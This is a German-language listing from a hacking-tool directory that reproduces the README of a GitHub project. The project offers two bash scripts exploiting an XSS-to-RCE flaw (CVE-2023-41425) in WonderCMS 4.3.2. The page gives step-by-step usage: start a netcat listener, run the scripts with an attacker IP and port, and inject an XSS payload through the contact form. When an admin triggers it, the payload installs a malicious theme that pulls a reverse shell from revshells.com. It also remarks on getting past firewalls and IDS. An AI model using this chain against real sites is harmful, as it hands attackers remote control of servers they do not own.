Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
Payload-GenerierungExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Refurbish

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
3vor 1 JahrNoch nicht geprüft
Teilen

Kaufe mir Wissen

WonderCMS 4.3.2 XSS-zu-RCE-Exploits

Übersicht

Diese Skripte nutzen eine XSS (Cross-Site Scripting) Schwachstelle in WonderCMS 4.3.2 aus, um Remote Code Execution (RCE) zu erreichen. Das XSS-Payload installiert bei Auslösung durch den Admin automatisch eine Reverse Shell auf dem Zielserver, indem es ein manipuliertes bösartiges Theme-Modul verwendet. Die Reverse Shell wird von revshells.com bezogen und ausgeführt, wodurch der Angreifer Fernzugriff auf den Server erhält.


Inhaltsverzeichnis

  • Voraussetzungen
  • Skript 1: Automatischer Exploit
    • Funktionen
    • Verwendung
  • Skript 2: Manueller Exploit
    • Funktionen
    • Verwendung
  • Hinweise
  • Lizenz

Voraussetzungen

Um eines der Skripte erfolgreich auszuführen, sind die folgenden Werkzeuge und Bedingungen erforderlich:

  1. Bash-Shell: Beide Skripte sind für Linux-Umgebungen mit der Bash-Shell geschrieben.
  2. netcat (nc): Wird verwendet, um auf die Reverse Shell-Verbindung zu lauschen.
  3. Python3: Ein einfacher Python-HTTP-Server wird verwendet, um das XSS-Payload zu hosten.
  4. WonderCMS 4.3.2: Das Ziel muss eine angreifbare Version von WonderCMS ausführen.
  5. Administrator-Interaktion: Das Payload erfordert, dass ein Admin das XSS auslöst, was zur Ausführung der Reverse Shell führt.
  6. revshells.com: Das Reverse Shell-Payload wird dynamisch von revshells.com heruntergeladen.

Skript 1: Automatischer Exploit

POC

Pasted image 20241010021603

Funktionen

Diese Version des Exploits überprüft automatisch, ob ein aktiver nc-Listener vorhanden ist, lädt die Reverse Shell herunter, startet den HTTP-Server, sendet das Payload und wartet darauf, dass der Admin die Reverse Shell auslöst.

  • Automatische Reverse Shell-Einrichtung: Lädt eine vorgefertigte Reverse Shell von revshells.com herunter.
  • XSS-Payload-Injektion: Injiziert ein XSS-Payload in das Kontaktformular des Ziels.
  • HTTP-Server-Verwaltung: Startet automatisch einen Python-HTTP-Server, um das Reverse Shell-Payload zu hosten.
  • nc-Listener-Prüfung: Stellt sicher, dass der Listener läuft, bevor fortgefahren wird.
  • Automatisches Senden des Payloads: Sendet das Payload automatisch ohne Benutzereingriff.

Verwendung

  1. Stellen Sie sicher, dass der nc-Listener auf dem angegebenen Port läuft:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Führen Sie das Skript mit dem folgenden Befehl aus:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Beispiel:
    root@kitploit:~
    ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Arbeitsablauf

  1. Reverse Shell herunterladen: Das Skript lädt die Reverse Shell von revshells.com herunter.
  2. Reverse Shell modifizieren: Das Reverse Shell-Skript wird mit der IP und dem Port des Angreifers aktualisiert.
  3. ZIP-Payload erstellen: Eine ZIP-Datei, die die Reverse Shell enthält, wird erstellt.
  4. XSS-Payload erstellen: Ein XSS-Payload, das die Reverse Shell installiert, wird generiert und in das angreifbare Kontaktformular injiziert.
  5. HTTP-Server automatisch starten: Das Skript startet einen Python-HTTP-Server, um das bösartige Payload bereitzustellen.
  6. Payload automatisch senden: Das XSS-Payload wird automatisch an den Admin gesendet.

Skript 2: Manueller Exploit

POC

Pasted image 20241010013048

Verwenden Sie den vom Skript bereitgestellten Exploit im Feld 'Website'...

Pasted image 20241010013218

Funktionen

Diese Version erfordert, dass der Benutzer den nc-Listener und das Auslösen des XSS-Payloads manuell verwaltet. Sie eignet sich besser für Szenarien, in denen automatische Prozesse nicht erwünscht sind.

  • Manuelle Reverse Shell-Einrichtung: Der Benutzer ist dafür verantwortlich, dass der Listener läuft.
  • Manuelles XSS-Auslösen: Das Skript stellt den bösartigen Link bereit, der an den Admin gesendet werden muss, aber das Payload muss manuell ausgelöst werden.
  • HTTP-Server-Verwaltung: Startet einen Python-HTTP-Server, um das XSS-Payload zu hosten.

Verwendung

  1. Stellen Sie sicher, dass der nc-Listener auf dem angegebenen Port läuft:
    root@kitploit:~
    nc -nvlp <PORT>
    
  2. Führen Sie das Skript mit dem folgenden Befehl aus:
    root@kitploit:~
    ./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
    
    Beispiel:
    root@kitploit:~
    ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
    

Arbeitsablauf

  1. Reverse Shell herunterladen: Lädt eine Reverse Shell von revshells.com herunter.
  2. Reverse Shell modifizieren: Aktualisiert die Reverse Shell mit der IP und dem Port des Angreifers.
  3. ZIP-Payload erstellen: Erstellt eine ZIP-Datei, die die Reverse Shell enthält.
  4. XSS-Payload erstellen: Generiert ein XSS-Payload, das die Reverse Shell installiert.
  5. Bösartigen Link anzeigen: Zeigt den Link an, der zum Auslösen an den Admin gesendet werden muss.
  6. HTTP-Server starten: Startet einen Python-HTTP-Server, um das Payload zu hosten.

Hinweise

  • Admin-Interaktion: Beide Exploits basieren darauf, dass der WonderCMS-Admin das XSS-Payload durch Besuch der angreifbaren Seite auslöst. Nach der Auslösung wird die Reverse Shell mit dem Rechner des Angreifers hergestellt.
  • Firewall/IDS/IPS: Seien Sie vorsichtig, wenn Sie diese Exploits in Umgebungen ausführen, die durch Firewalls oder Intrusion Detection Systems (IDS) geschützt sind, die verdächtige Aktivitäten blockieren oder melden könnten.
  • Verantwortungsvolle Offenlegung: Wenn Sie feststellen, dass ein Ziel angreifbar ist, befolgen Sie stets ethische Richtlinien und melden Sie die Schwachstelle den zuständigen Stellen.
Tool herunterladen